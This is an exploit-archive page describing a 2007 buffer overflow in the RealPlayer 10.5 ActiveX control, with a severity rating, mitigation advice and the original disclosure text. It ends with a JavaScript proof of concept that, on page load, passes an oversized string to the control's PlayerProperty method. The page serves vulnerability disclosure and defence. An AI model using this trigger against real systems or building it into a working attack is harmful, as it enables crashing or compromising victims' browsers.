Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
RealPlayer ActiveX Control Buffer Overflow Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
RealPlayer
by:
e.b.
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: RealPlayer
Affected Version From: RealPlayer 10.5
Affected Version To: RealPlayer 10.5
Patch Exists: YES
Related CWE:
CPE: a:realnetworks:realplayer:10.5
Metasploit:
Other Scripts:
Platforms Tested: Windows (Internet Explorer)
2007

RealPlayer ActiveX Control Buffer Overflow Vulnerability

The RealPlayer ActiveX control is prone to a buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. A remote attacker may exploit this vulnerability by presenting a malicious file to a victim and enticing them to open it with the vulnerable application. Successful exploits can allow attackers to run arbitrary code in the context of the user running an application that uses the control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

Mitigation:

Ensure that the affected ActiveX control is not used in any web pages or disable the control in Internet Explorer. Additionally, exercise caution when opening files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26586/info

The RealPlayer ActiveX control is prone to a buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.

A remote attacker may exploit this vulnerability by presenting a malicious file to a victim and enticing them to open it with the vulnerable application.

Successful exploits can allow attackers to run arbitrary code in the context of the user running an application that uses the control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

This issue affects RealPlayer 10.5; other versions may also be affected.

NOTE: This issue was originally covered in BID 22811 - RealMedia RealPlayer Ierpplug.DLL ActiveX Control Multiple Buffer Overflow Vulnerabilities. 

<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}


      var obj2 = obj.PlayerProperty(s);


   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">

 </body>